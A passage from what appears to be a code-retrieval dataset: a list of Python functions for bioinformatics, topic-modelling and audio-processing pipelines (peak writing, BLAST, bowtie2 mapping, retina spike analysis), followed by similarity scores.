options.summitbed, \"w\" )\n peakdetect.peaks.write_to_summit_bed (ofhd_summits, name_prefix=\"%s_peak_\".encode(), name=options.name.encode(),\n description=(\"Summits for %s (Made with MACS v2, \" + strftime(\"%x\") + \")\").encode(),\n score_column=score_column, trackline=options.trackline )\n ofhd_summits.close()\n #4.2 broad peaks in bed12 or gappedPeak\n else:\n info(\"#4 Write broad peak in broadPeak format file... %s\" % (options.peakBroadPeak))\n ofhd_bed = open( options.peakBroadPeak, \"w\" )\n peakdetect.peaks.write_to_broadPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), description=options.name.encode(), score_column=score_column, trackline=options.trackline)\n ofhd_bed.close()\n info(\"#4 Write broad peak in bed12/gappedPeak format file... 
%s\" % (options.peakGappedPeak))\n ofhd_bed = open( options.peakGappedPeak, \"w\" )\n peakdetect.peaks.write_to_gappedPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), description=options.name.encode(), score_column=score_column, trackline=options.trackline)\n ofhd_bed.close()\n\n info(\"Done!\")", "def main():\n parser = argparse.ArgumentParser(description='Run dap model on signalmedia data.')\n parser.add_argument('--train_file', type=str, help='Path to training data file.',\n default=\"train_signalmedia.dap\")\n parser.add_argument('--test_file', type=str, help='Path to testing data file. If None, no prediction is run',\n default=\"test_signalmedia.dap\")\n parser.add_argument('--vocab_file', type=str, help='Path to vocabulary file.',\n default=\"signalmedia.bow.vocab\")\n parser.add_argument('--data_dir', type=str, help='directory where all data files reside.')\n parser.add_argument('--evaluate_every', type=int,\n help=\"If given a test file, number of EM iterations between evaluations of test set. Default of 0 = evaluate after each epoch.\")\n parser.add_argument('--max_training_minutes', type=float,\n help=\"If given this will stop training once the specified number of minutes have elapsed.\")\n parser.add_argument('--max_epochs', type=int)\n parser.add_argument('--process_noise', type=float, default=0.2)\n parser.add_argument('--measurement_noise', type=float, default=0.8)\n parser.add_argument('--num_topics', type=int, default=75)\n parser.add_argument('--num_personas', type=int, default=25)\n parser.add_argument('--regularization', type=float, default=0.2,\n help=\"How much to penalize similar personas. Recommend [0, 0.5].\")\n parser.add_argument('--batch_size', type=int, default=512,\n help=\"Batch size. Set to -1 for full gradient updates, else stochastic mini-batches used.\")\n parser.add_argument('--num_workers', type=int, default=1)\n args = parser.parse_args()\n\n path_to_current_file = os.path.abspath(os.path.dirname(__file__))\n if args.data_dir is None:\n data_dir = os.path.join(path_to_current_file, \"../../data/signalmedia/blogs_aligned_3_30/\")\n else:\n data_dir = args.data_dir\n\n np.random.seed(2018)\n\n disable_log = False\n if disable_log:\n logging.disable(logging.INFO)\n else:\n log_format = '%(asctime)s : %(levelname)s : %(message)s'\n logging.basicConfig(format=log_format, level=logging.INFO)\n\n # initialize model\n dap = DAPPER(num_topics=args.num_topics, num_personas=args.num_personas,\n process_noise=args.process_noise, measurement_noise=args.measurement_noise,\n regularization=args.regularization,\n max_epochs=args.max_epochs, max_training_minutes=args.max_training_minutes,\n batch_size=args.batch_size,\n step_size=0.7, learning_offset=10, learning_decay=0.7,\n num_workers=args.num_workers)\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n train = Corpus(input_file=data_dir + args.train_file, vocab_file=data_dir + args.vocab_file)\n test = Corpus(input_file=data_dir + args.test_file,\n vocab_file=data_dir + args.vocab_file,\n author2id=train.author2id)\n\n train_results, test_results = dap.fit_predict(train_corpus=train, test_corpus=test,\n evaluate_every=args.evaluate_every,\n random_beta=False,\n check_model_lhood=True)\n # train_results = dap.fit(corpus=train, random_beta=False, check_model_lhood=False)\n print(dap)\n\n # save model output\n results_dir = data_dir.replace(\"/data/\", \"/results/\")\n if not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\n model_sig = 
\"K{}_P{}_bs{}_pn{}_mn{}_reg{}_epochs{}_cpu{}_{}.txt\".format(\n args.num_topics, args.num_personas,\n args.batch_size,\n int(100 * args.process_noise), int(100 * args.measurement_noise),\n int(100 * args.regularization), dap.total_epochs,\n args.num_workers, time.strftime('%m_%d_%Y_%H%M'))\n dap.save_topics(filename=results_dir + \"topics_\" + model_sig, topn=10)\n dap.save_author_personas(filename=results_dir + \"personas_\" + model_sig)\n dap.save_persona_topics(filename=results_dir + \"alpha_\" + model_sig)\n dap.save_convergences(filename=results_dir + \"train_convergence_\" + model_sig, results=train_results)\n dap.save_convergences(filename=results_dir + \"test_convergence_\" + model_sig, results=test_results)", "def run_experiment():\n pass", "def run(args):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n # create a plot subcommand\n parser_plot = subparsers.add_parser('plot', aliases=[\"plt\", \"p\"],\n help='plot a set of discrete signals')\n parser_plot.add_argument(\n 'files', nargs='+', help='audio files to be plotted requiers >=1')\n parser_plot.set_defaults(func=plot)\n\n # create a interpolation subcommand\n parser_interpolation = subparsers.add_parser('interpolate', aliases=[\"inp\", \"interp\"],\n help='interpolate a signal by a factor a')\n parser_interpolation.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_interpolation.add_argument('factor', help='factor of interpolation')\n parser_interpolation.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_interpolation.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_interpolation.set_defaults(func=interpolate)\n\n # create a decimation subcommand\n parser_decimation = subparsers.add_parser('decimate', aliases=[\"dec\", \"d\"],\n help='downsample a signal by a factor a')\n parser_decimation.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_decimation.add_argument('factor', help='factor of downsampling')\n parser_decimation.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_decimation.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_decimation.set_defaults(func=decimate)\n\n # create a shift subcommand\n parser_shift = subparsers.add_parser('shift', aliases=[\"s\", \"sh\"],\n help='shifts a signal n times in time')\n parser_shift.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_shift.add_argument('factor', help='shift amount')\n parser_shift.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_shift.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_shift.set_defaults(func=shift)\n\n # create a reflect subcommand\n parser_reflect = subparsers.add_parser('reflect', aliases=[\"r\", \"rf\"],\n help='reflecrts a signal in time')\n parser_reflect.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_reflect.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_reflect.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_reflect.set_defaults(func=reflect)\n\n # create a mamplitude subcommand\n parser_mamplitude = subparsers.add_parser('mamplitude', aliases=[\"ma\", \"mamp\"],\n help='modifies 
the amplitude of a signal')\n parser_mamplitude.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_mamplitude.add_argument('factor', help='amplitude amount')\n parser_mamplitude.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_mamplitude.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_mamplitude.set_defaults(func=mamplitude)\n\n # create a record subcommand\n parser_record = subparsers.add_parser('record', aliases=[\"rec\", \"r\"],\n help='records audio from computer\\'s built in mic')\n parser_record.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='record.wav')\n parser_record.add_argument(\n '-secs', '-s', help=\"seconds of audio to be recorded\", default=4)\n parser_record.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_record.set_defaults(func=record)\n\n # create a play subcommand\n parser_play = subparsers.add_parser('play', aliases=[\"pl\", \"reproduce\"],\n help='reproduces audio from file')\n parser_play.add_argument(\n 'ipath', help=\"Path of the audio file\")\n parser_play.add_argument(\n '-plot', '-p', help=\"plot the audio signal\", default=False)\n parser_play.set_defaults(func=play)\n\n # create a gui subcommand\n parser_gui = subparsers.add_parser('gui', aliases=[\"g\", \"interface\"],\n help='launches the program in gui mode')\n parser_gui.set_defaults(func=guiMode)\n\n # parse arguments from shell\n if len(sys.argv) <= 1:\n sys.argv.append('--help')\n options = parser.parse_args()\n options.func(options)", "def run_everything(self):\n try:\n if self.database == \"genome\":\n self.genome_deprecation()\n return\n\n record = self.ncbi_search(self.database, self.term)\n count = record[\"count\"]\n self.original_count = count\n\n self.main_organizer(count, record[\"qkey\"], record[\"webenv\"])\n except ProgramDone:\n return", "def run():\n build_no_documentation()\n build_sphinx_build()\n #build_sphinx_pdf()\n build_graphviz_files()", "def main():\r\n # Read dataset.\r\n reader = DatasetReader\r\n train_filename = sys.argv[1]\r\n test_filename = train_filename.replace('_train_', '_dev_')\r\n term_index, tag_index, train_data, test_data = reader.ReadData(train_filename, test_filename)\r\n (train_terms, train_tags, train_lengths) = train_data\r\n (test_terms, test_tags, test_lengths) = test_data\r\n\r\n model = SequenceModel(train_tags.shape[1], len(term_index), len(tag_index))\r\n model.build_inference()\r\n model.build_training()\r\n for j in range(5):\r\n model.train_epoch(train_terms,train_tags, train_lengths)\r\n print('Finished epoch %i. Evaluating ...' 
% (j+1))\r\n model.evaluate(test_terms, test_tags, test_lengths)", "def run(self, workbench, engine):\n pass", "def run(self):\n self.run_measurement()\n self.run_analysis()\n self.results = self.analysis.proc_data_dict['analysis_params_dict']\n if self.get_param_value('update'):\n self.run_update()\n self.dev.update_cancellation_params()\n\n if self.get_param_value('configure_mux_drive'):\n drive_lo_freqs = self.get_param_value('drive_lo_freqs')\n configure_qubit_mux_drive(self.qubits, drive_lo_freqs)", "def exec_blast(infile, config_file, out_name):\n\tdb, evalue = parse_config(config_file, \"blast\")\n\tfasta_string = SeqIO.read(infile, format=\"fasta\")\n\tresult_handle = NCBIWWW.qblast(\"blastp\", \"nr\", fasta_string.seq)\n\toutput= out_name + \".xml\"\n\tsave_file = open(output, \"w\")\n\tsave_file.write(result_handle.read())\n\tsave_file.close()\n\tresult_handle.close()\n\treturn (output)", "def main():\n import logging\n from pbtranscript.__init__ import get_version\n log = logging.getLogger(__name__)\n args = get_args()\n from pbtranscript.Utils import setup_log\n setup_log(alog=log, level=logging.DEBUG)\n log.info(\"Running {f} v{v}.\".format(f=op.basename(__file__),\n v=get_version()))\n\n splitFaFq(input_fa_or_fq=args.input_fa_or_fq,\n reads_per_split=args.reads_per_split,\n out_dir=args.out_dir,\n out_format=args.out_format,\n is_fq=args.is_fq)", "def main():\n op = help()\n for t in [\"bowtie2\", \"samtools\", \"bamToBed\"]:\n if not isTool(t):\n logger.error(\"%s not exits! Please install through conda.\" % t)\n return\n if not os.path.exists(op.fqd):\n logger.error(\"Input %s not exists! Return.\" % op.fqd)\n return\n if len(glob(op.ref + \"*.bt2\")) == 0:\n logger.error(\"Bowtie2 reference not exists for prefix of %s! Return.\" %\n op.ref)\n return\n if not os.path.exists(op.output):\n os.makedirs(op.output, exist_ok=True)\n else:\n fs = glob(os.path.join(op.output, \"*\"))\n if len(fs) > 0:\n logger.info(\n \"Target output directory %s is not empty, may over-write some files.\"\n % op.output)\n\n #mapping\n data = preFqs(op.fqd)\n if len(data) == 0:\n logger.error(\n \"No matched _R1.fastq.gz and _R2.fastq.gz in %s. 
Return.\" %\n (op.fqd))\n return\n ref = op.ref\n sams = Parallel(n_jobs=op.number,backend=\"multiprocessing\")(\n delayed(tracMapping)(sample, fqs, ref, op.output, cpus=op.cpu)\n for sample, fqs in data.items())\n sams = [sam for sam in sams if sam is not None]\n\n #sam to bam and bedpe\n cpus = op.number * op.cpu\n ncpus = int(min(len(sams), cpus / 2))\n bedpes = Parallel(n_jobs=ncpus,backend=\"multiprocessing\")(delayed(sam2bamBedpe)(sam) for sam in sams)\n\n #cLoops2 qc\n cmd = \"cLoops2 qc -f %s -o bedpeQc -p %s\" % (\",\".join(bedpes),\n min(len(bedpes), cpus))\n callSys([cmd], logger)\n\n #combine report\n mata = parseBowtielog()\n matb = pd.read_csv(\"bedpeQc_bedpeQc.txt\", index_col=0, sep=\"\\t\")\n matb.index = [i.split(\"_all\")[0] for i in matb.index]\n for c in matb.columns:\n mata[c] = matb[c]\n mata.to_csv(\"tracPre_summary.txt\", sep=\"\\t\")\n cmd = \"rm bedpeQc_bedpeQc.txt\"\n os.system(cmd)", "def asm_pipeline_cmd(sample_name):\n assert bool(TenxApp.config) is True, \"Must provide tenx yaml config file!\"\n sys.stderr.write(\"Run assembly pipeline for {}\\n\".format(sample_name))\n hostname = socket.gethostname()\n notifications.slack(\"{} START {}\".format(sample_name, hostname))\n sample = TenxSample(base_path=TenxApp.config[\"TENX_DATA_PATH\"], name=sample_name)\n asm = sample.assembly()\n try:\n run_pipeline(asm)\n except BaseException as ex:\n sys.stderr.write(\"Exception: {}\\n\".format(ex))\n sys.stderr.write(\"Exception encountered, sending notifications if configured...\\n\")\n notifications.slack(\"{} FAILED {}\".format(sample_name, socket.gethostname()))\n raise\n notifications.slack(\"{} SUCCESS {}\".format(sample_name, hostname))", "def analyze(ctx, filename, trigger, threshold, eyecandy, ignore_extra=False,\n fix_missing=False, output=None, notebook=None,\n configuration=None, verbose=False, debug=False,processes=None,\n by_channel=False, integrity_filter=0.0, analog_idx=1,\n default_channel_map=False, dev=False):\n print(\"version 0.5.1\")\n init_logging(filename, processes, verbose, debug)\n #### FILEPATHS\n logger.debug(str(filename) + \" \" + str(os.path.curdir))\n if not os.path.isfile(filename):\n try:\n filename = glia.match_filename(filename,\"txt\")\n except:\n try:\n filename = glia.match_filename(filename,\"bxr\")\n except:\n filename = glia.match_filename(filename,\"csv\")\n \n data_directory, data_name = os.path.split(filename)\n name, extension = os.path.splitext(data_name)\n # ignore first of two extensions (if applicable)\n name, _ = os.path.splitext(name)\n analog_file = os.path.join(data_directory, name +'.analog')\n if not os.path.isfile(analog_file):\n # use 3brain analog file\n analog_file = os.path.join(data_directory, name +'.analog.brw')\n\n if not os.path.isfile(analog_file):\n # Tyler's format; used if files were split for example\n analog_file = os.path.join(data_directory, name +'.analog.npz')\n\n stimulus_file = os.path.join(data_directory, name + \".stim\")\n ctx.obj = {\"filename\": os.path.join(data_directory,name)}\n print(f\"Analyzing {name}\")\n\n if configuration!=None:\n with open(configuration, 'r') as f:\n user_config = yaml.safe_load(f)\n config.user_config = user_config\n if \"analog_calibration\" in user_config:\n config.analog_calibration = user_config[\"analog_calibration\"]\n if \"notebook\" in user_config:\n notebook = user_config[\"notebook\"]\n if \"eyecandy\" in user_config:\n eyecandy = user_config[\"eyecandy\"]\n if \"processes\" in user_config:\n processes = user_config[\"processes\"]\n if 
\"integrity_filter\" in user_config:\n integrity_filter = user_config[\"integrity_filter\"]\n if \"by_channel\" in user_config:\n by_channel = user_config[\"by_channel\"]\n\n if not notebook:\n notebook = glia.find_notebook(data_directory)\n\n lab_notebook = glia.open_lab_notebook(notebook)\n logger.info(f\"{name=}\")\n experiment_protocol = glia.get_experiment_protocol(lab_notebook, name)\n flicker_version = experiment_protocol[\"flickerVersion\"]\n\n\n #### LOAD STIMULUS\n try:\n metadata, stimulus_list, method = glia.read_stimulus(stimulus_file)\n ctx.obj[\"stimulus_list\"] = stimulus_list\n ctx.obj[\"metadata\"] = metadata\n # assert method=='analog-flicker'\n except:\n print(\"No .stim file found. Creating from .analog file.\".format(trigger))\n if flicker_version==0.3:\n metadata, stimulus_list = glia.create_stimuli(\n analog_file, stimulus_file, notebook, name, eyecandy, analog_idx, ignore_extra,\n config.analog_calibration, threshold)\n ctx.obj[\"stimulus_list\"] = stimulus_list\n ctx.obj[\"metadata\"] = metadata\n print('finished creating .stim file')\n elif trigger == \"ttl\":\n raise ValueError('not implemented')\n else:\n raise ValueError(\"invalid trigger: {}\".format(trigger))\n \n # look for .frames file\n try:\n lab_notebook_notype = glia.open_lab_notebook(notebook, convert_types=False)\n protocol_notype = glia.get_experiment_protocol(lab_notebook_notype,\n name)\n date_prefix = os.path.join(data_directory,\n protocol_notype['date'].replace(':','_'))\n frames_file = date_prefix + \"_eyecandy_frames.log\"\n video_file = date_prefix + \"_eyecandy.mkv\"\n frame_log = pd.read_csv(frames_file)\n frame_log = frame_log[:-1] # last frame is not encoded for some reason\n ctx.obj[\"frame_log\"] = frame_log\n ctx.obj[\"video_file\"] = video_file\n except Exception as e:\n extype, value, tb = sys.exc_info()\n traceback.print_exc()\n print(e)\n ctx.obj[\"frame_log\"] = None\n ctx.obj[\"video_file\"] = None\n print(\"Attempting to continue without frame log...\")\n \n #### LOAD SPIKES\n spyking_regex = re.compile('.*\\.result.hdf5$')\n eye = experiment_protocol['eye']\n experiment_n = experiment_protocol['experimentNumber']\n\n date = experiment_protocol['date'].date().strftime(\"%y%m%d\")\n\n retina_id = date+'_R'+eye+'_E'+experiment_n\n if extension == \".txt\":\n ctx.obj[\"units\"] = glia.read_plexon_txt_file(filename,retina_id, channel_map)\n elif extension == \".bxr\":\n if default_channel_map:\n channel_map_3brain = config.channel_map_3brain\n else:\n channel_map_3brain = None\n ctx.obj[\"units\"] = glia.read_3brain_spikes(filename, retina_id,\n channel_map_3brain, truncate=dev)\n elif extension == \".csv\":\n ctx.obj[\"units\"] = glia.read_csv_spikes(filename, retina_id) \n elif re.match(spyking_regex, filename):\n ctx.obj[\"units\"] = glia.read_spyking_results(filename)\n else:\n raise ValueError(f'could not read {extension=}. 
Is it a plexon or spyking circus file?')\n\n #### DATA MUNGING OPTIONS\n if integrity_filter>0.0:\n good_units = solid.filter_units_by_accuracy(\n ctx.obj[\"units\"], ctx.obj['stimulus_list'], integrity_filter)\n filter_good_units = glia.f_filter(lambda u,v: u in good_units)\n ctx.obj[\"units\"] = filter_good_units(ctx.obj[\"units\"])\n\n if by_channel:\n ctx.obj[\"units\"] = glia.combine_units_by_channel(ctx.obj[\"units\"])\n\n\n # prepare_output\n plot_directory = os.path.join(data_directory, name+\"-plots\")\n config.plot_directory = plot_directory\n\n os.makedirs(plot_directory, exist_ok=True)\n os.chmod(plot_directory, 0o777)\n\n if output == \"pdf\":\n logger.debug(\"Outputting pdf\")\n ctx.obj[\"retina_pdf\"] = PdfPages(glia.plot_pdf_path(plot_directory, \"retina\"))\n ctx.obj[\"unit_pdfs\"] = glia.open_pdfs(plot_directory, list(ctx.obj[\"units\"].keys()), Unit.name_lookup())\n # c connotes 'continuation' for continuation passing style\n ctx.obj[\"c_unit_fig\"] = partial(glia.add_to_unit_pdfs,\n unit_pdfs=ctx.obj[\"unit_pdfs\"])\n ctx.obj[\"c_retina_fig\"] = lambda x: ctx.obj[\"retina_pdf\"].savefig(x)\n\n elif output == \"png\":\n logger.debug(\"Outputting png\")\n ctx.obj[\"c_unit_fig\"] = glia.save_unit_fig\n ctx.obj[\"c_retina_fig\"] = glia.save_retina_fig\n os.makedirs(os.path.join(plot_directory,\"00-all\"), exist_ok=True)\n\n for unit_id in ctx.obj[\"units\"].keys():\n name = unit_id\n os.makedirs(os.path.join(plot_directory,name), exist_ok=True)" ]
[ "0.5965446", "0.5941467", "0.5888768", "0.5804564", "0.57392657", "0.5699895", "0.5644962", "0.5548859", "0.5535779", "0.5506015", "0.54572743", "0.54180855", "0.5404095", "0.54018456", "0.53995997", "0.53812164", "0.53697616", "0.5368945", "0.5345558", "0.5340646", "0.5333773", "0.5324846", "0.53215164", "0.532145", "0.5311923", "0.5310135", "0.5288766", "0.5287111", "0.52798647", "0.5254399", "0.5253472", "0.5250674", "0.52332443", "0.52160335", "0.5208722", "0.52061", "0.52013814", "0.519535", "0.51884377", "0.5183631", "0.5182867", "0.518253", "0.5177152", "0.5176735", "0.51717913", "0.5139228", "0.51278853", "0.51244485", "0.51130253", "0.5112288", "0.5110361", "0.5101496", "0.5100255", "0.50972956", "0.5096399", "0.5090798", "0.50855446", "0.5084939", "0.5076215", "0.50756", "0.50747263", "0.5064195", "0.5062647", "0.5049706", "0.5046582", "0.5036209", "0.5026771", "0.50198144", "0.5019041", "0.50031453", "0.50001943", "0.49981198", "0.49970615", "0.49864095", "0.49855623", "0.4980293", "0.49714166", "0.49705303", "0.4966787", "0.4961691", "0.49586433", "0.49569666", "0.49533758", "0.49496102", "0.4940417", "0.4939942", "0.4938488", "0.49357465", "0.4925137", "0.49155885", "0.49120322", "0.49105346", "0.4909714", "0.48996636", "0.48942354", "0.48936334", "0.48929456", "0.4889576", "0.48892176", "0.4880262" ]
0.6089528
0
Set parameters of the instance.
def fit(self, signal):
        if signal.ndim == 1:
            self.signal = signal.reshape(-1, 1)
        else:
            self.signal = signal
        return self
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_params(self):\n raise NotImplementedError", "def set_params(self, **kwargs):\n ...", "def set_params(self):\r\n pass", "def set_params(self, params):", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)", "def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self", "def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()", "def set_params(self, **params: Any) -> Self:\n return _set_params(self, **params)", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n\n for key, value in params.items():\n if hasattr(self, key):\n setattr(self, key, value)\n else:\n self.kwargs[key] = value\n\n return self", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_parameters(self, params):\n self.kp = params.pgain", "def setParams(self, paramSet):\r\n pass", "def set_params(self, *arg):\n pass", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self", "def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()", "def set_params(self, **parameters):\n for parameter, value in parameters.items():\n if parameter == 'predictor':\n if isinstance(value, chainer.Link):\n del self.predictor\n with self.init_scope():\n self.predictor = value\n else:\n assert False, 'predictor is not Chain instance'\n elif parameter in ['lossfun', 'accfun', 'device']:\n setattr(self, parameter, value)\n else:\n self.sk_params.update({parameter: value})\n return self", "def set_params(self, *, params: Params) -> None: # pragma: no cover\n\t\tsuper().set_params(params=params)", "def set_params(self, **params):\n return super().set_params(**params)", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def set_params(self, **params):\n\n return super().set_params(**params)", "def setParameters(self):\n\n # Set the parameters\n self.taux = 24.2\n self.mu = 0.23\n self.G = 33.75\n self.alpha_0 = 0.05\n self.delta = 0.0075\n self.p = 0.50\n self.I0 = 9500.0\n self.kparam = 0.55", "def _set_params(self, *args, **kwargs):\n\n params = args[0]\n\n # check for attempt to set readonly parameters (read-only or immutable set outside startup)\n self._verify_not_readonly(*args, **kwargs)\n old_config = self._param_dict.get_config()\n\n for (key, val) in params.iteritems():\n log.debug(\"KEY = \" + str(key) + \" VALUE = \" + str(val))\n self._param_dict.set_value(key, val)\n\n 
new_config = self._param_dict.get_config()\n # check for parameter change\n if not dict_equal(old_config, new_config):\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def set_user_parameters(self, **params: dict):\n\n assert params, \"params variable can't be None\"\n for p, val in params.items():\n setattr(self, p, val)\n self.construct_repr_length()", "def set_parameters(self):\n\n if self.model_with_set_params:\n return\n\n self._model_with_set_params = self._parameter_values.process_model(\n self._unprocessed_model, inplace=False\n )\n self._parameter_values.process_geometry(self.geometry)\n self.model = self._model_with_set_params", "def set_params(self, params: Dict):\n\n if params['training_instances'] is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None", "def setParameters(self, izParameters): #$NON-NLS-1$\r", "def set_parameters(self, *args, **kwargs):\n if len(args) > 0:\n if hasattr(args[0], '__iter__'):\n self._parameters = self._Parameters(*args[0])\n elif args[0] is None:\n self._parameters = self._Parameters()\n else:\n self._parameters = self._Parameters(*args)\n else:\n self._parameters = self._Parameters(**kwargs)", "def _set_params(self,x):\r\n self.k._set_params(x)", "def set_params(self, params):\n params = dict_to_namespace(params)\n\n # Set self.params\n self.params = Namespace()\n self.params.ndimx = params.ndimx\n self.params.model_str = getattr(params, 'model_str', 'optfixedsig')\n self.params.ig1 = getattr(params, 'ig1', 4.0)\n self.params.ig2 = getattr(params, 'ig2', 3.0)\n self.params.n1 = getattr(params, 'n1', 1.0)\n self.params.n2 = getattr(params, 'n2', 1.0)\n self.params.sigma = getattr(params, 'sigma', 1e-5)\n self.params.niter = getattr(params, 'niter', 70)\n self.params.kernel = getattr(params, 'kernel', kern_matern)\n self.params.trans_x = getattr(params, 'trans_x', False)", "def set(self, **parameters):\r\n for name in parameters:\r\n if name in self.prm:\r\n self.prm[name] = parameters[name]\r\n else:\r\n self._illegal_parameter(name)", "def set_params(self, **kwargs):\n for param_name, value in kwargs.iteritems():\n # only set parameters that are in the default\n if param_name in self._default_params():\n setattr(self, param_name, value)\n self.params[param_name] = value\n else:\n print('AdjustedStat class does not accept %s as a ' \\\n 'parameter and will be ignored' % param_name)", "def setParameters(self, params):\n self.module._setParameters(params)\n # update parameters for learner\n self.learner.setModule(self.module)", "def set(self, **kwargs):\n raise NotImplementedError", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def set_params(self, w, b):\n self.w = w\n self.b = b\n return", "def set_params(self, **params):\n return self.forest.set_params(**params)", "def set_shape_params(self, params):\n self.alpha = params[0]\n self.beta = params[1]\n self.gamma = params[2]\n self.c500 = params[3]\n self.P0 = params[4]", "def setParameter(self, name, value):", "def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = 
value\n else:\n raise KeyError", "def set_hyperparams(self, params):", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def updateParameters(self, parameters):", "def set_params(self, state_dicts):\n raise NotImplementedError", "def _set_params(self, *args, **kwargs):\n try:\n params = args[0]\n except IndexError:\n raise InstrumentParameterException('Set command requires a parameter dict.')\n\n self._verify_not_readonly(*args, **kwargs)\n update_params = False\n\n # check values that the instrument doesn't validate\n # handle special cases for driver specific parameters\n for (key, val) in params.iteritems():\n if key == Parameter.PUMP_DELAY and (val < MIN_PUMP_DELAY or val > MAX_PUMP_DELAY):\n raise InstrumentParameterException(\"pump delay out of range\")\n elif key == Parameter.NUM_AVG_SAMPLES and (val < MIN_AVG_SAMPLES or val > MAX_AVG_SAMPLES):\n raise InstrumentParameterException(\"num average samples out of range\")\n\n for (key, val) in params.iteritems():\n\n old_val = self._param_dict.format(key)\n new_val = self._param_dict.format(key, val)\n log.debug(\"KEY = %r OLD VALUE = %r NEW VALUE = %r\", key, old_val, new_val)\n\n if old_val != new_val:\n update_params = True\n if ConfirmedParameter.has(key):\n # We add a write delay here because this command has to be sent\n # twice, the write delay allows it to process the first command\n # before it receives the beginning of the second.\n self._do_cmd_resp(Command.SET, key, val, write_delay=0.2)\n else:\n self._do_cmd_resp(Command.SET, key, val, **kwargs)\n\n log.debug(\"set complete, update params\")\n self._update_params()\n if update_params:\n self._update_params()", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def __init__(self, **parameters):\n self.parameters = parameters", "def set_parameters(self, **kwargs):\n\n invalid_params = set(self.parameter_names).difference(kwargs.keys())\n if invalid_params:\n raise ValueError(\n \"unknown parameters: {}\".format(\", \".join(invalid_params))) \n \n for parameter_name, value in kwargs.items():\n setattr(self, \"_{}\".format(parameter_name), value)\n\n return kwargs", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params[\"kwargs\"])\n self.save_smooth = params.get(\"save_smooth\", self.save_smooth)\n\n return self", "def update_params(self):\n pass", "def setParams(self, disable=False):\n if hasattr(self, \"_input_kwargs\"):\n kwargs = self._input_kwargs\n else:\n kwargs = self.__init__._input_kwargs\n return self._set(**kwargs)", "def updateParameters(self):\n\n return", "def __init__(self, **attributes):\n self.set(**attributes)", "def update(self, **params):\n self.parameters.update(params)", "def define_parameters(self):", "def __init__( self, parameters={} ):\n self.params = {}", "def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)", "def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined 
